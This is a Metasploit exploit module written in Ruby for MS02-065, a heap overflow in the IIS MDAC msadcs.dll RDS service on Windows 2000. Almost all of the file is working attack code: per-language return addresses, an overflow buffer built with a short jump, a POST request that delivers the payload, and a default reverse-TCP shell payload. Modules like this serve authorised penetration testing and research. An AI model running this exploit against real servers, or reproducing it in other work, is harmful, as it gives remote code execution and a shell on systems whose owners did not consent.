100 lines
3.7 KiB
Ruby
100 lines
3.7 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',
|
|
'Description' => %q{
|
|
This module can be used to execute arbitrary code on IIS servers
|
|
that expose the /msadc/msadcs.dll Microsoft Data Access Components
|
|
(MDAC) Remote Data Service (RDS) DataFactory service. The service is
|
|
exploitable even when RDS is configured to deny remote connections
|
|
(handsafe.reg). The service is vulnerable to a heap overflow where
|
|
the RDS DataStub 'Content-Type' string is overly long. Microsoft Data
|
|
Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.
|
|
},
|
|
'Author' => 'aushack',
|
|
'Platform' => 'win',
|
|
'Arch' => [ARCH_X86],
|
|
'References' => [
|
|
['OSVDB', '14502'],
|
|
['BID', '6214'],
|
|
['CVE', '2002-1142'],
|
|
['MSB', 'MS02-065'],
|
|
['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']
|
|
],
|
|
'Privileged' => false,
|
|
'Payload' => {
|
|
'Space' => 1024,
|
|
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x27:?<>=$\\/;=+%#&", # "\u0000\t\n\v\r \"':?<>=$\\/;=+%#&"
|
|
'StackAdjustment' => -3500
|
|
},
|
|
'DefaultOptions' => {
|
|
'PAYLOAD' => 'windows/shell/reverse_tcp',
|
|
'EXITFUNC' => 'seh' # stops IIS from crashing... hopefully
|
|
},
|
|
'Targets' => [
|
|
# jmp eax ws2help.dll
|
|
[ 'Windows 2000 Pro SP0-SP3 (English)', { 'Ret' => 0x75023783 } ],
|
|
[ 'Windows 2000 Pro SP0 (Korean)', { 'Ret' => 0x74f93783 } ],
|
|
[ 'Windows 2000 Pro SP0 (Dutch)', { 'Ret' => 0x74fd3783 } ],
|
|
[ 'Windows 2000 Pro SP0 (Finnish)', { 'Ret' => 0x74ff3783 } ],
|
|
[ 'Windows 2000 Pro SP0 (Turkish)', { 'Ret' => 0x74fc3783 } ],
|
|
[ 'Windows 2000 Pro SP0-SP1 (Greek)', { 'Ret' => 0x74f73783 } ],
|
|
[ 'Windows 2000 Pro SP1 (Arabic)', { 'Ret' => 0x74f93783 } ],
|
|
[ 'Windows 2000 Pro SP1 (Czech)', { 'Ret' => 0x74fc3783 } ],
|
|
[ 'Windows 2000 Pro SP2 (French)', { 'Ret' => 0x74fa3783 } ],
|
|
[ 'Windows 2000 Pro SP2 (Portuguese)', { 'Ret' => 0x74fd3783 } ],
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => '2002-11-02',
|
|
'Notes' => {
|
|
'Reliability' => [REPEATABLE_SESSION],
|
|
'Stability' => [CRASH_SERVICE_DOWN],
|
|
'SideEffects' => [IOC_IN_LOGS]
|
|
}
|
|
)
|
|
)
|
|
|
|
register_options([
|
|
OptString.new('TARGETURI', [ true, 'The path to msadcs.dll', '/msadc/msadcs.dll' ], aliases: [ 'PATH' ]),
|
|
])
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi('uri' => normalize_uri(target_uri.path))
|
|
|
|
return CheckCode::Unknown('Connection failed') unless res
|
|
return CheckCode::Unknown('HTTP server error') if res.code == 500
|
|
return CheckCode::Safe('Access Forbidden') if res.code == 403
|
|
|
|
if res.code == 200 && res.body.to_s.include?('Content-Type: application/x-varg')
|
|
return CheckCode::Detected("#{target_uri.path} content type matches fingerprint application/x-varg")
|
|
end
|
|
|
|
CheckCode::Safe
|
|
end
|
|
|
|
def exploit
|
|
sploit = rand_text_alphanumeric(136)
|
|
sploit[24, 2] = Rex::Arch::X86.jmp_short(117)
|
|
sploit << [target['Ret']].pack('V')
|
|
sploit << payload.encoded
|
|
|
|
send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path, '/AdvancedDataFactory.Query'),
|
|
'method' => 'POST',
|
|
'data' => "Content-Type: #{sploit}"
|
|
})
|
|
end
|
|
end
|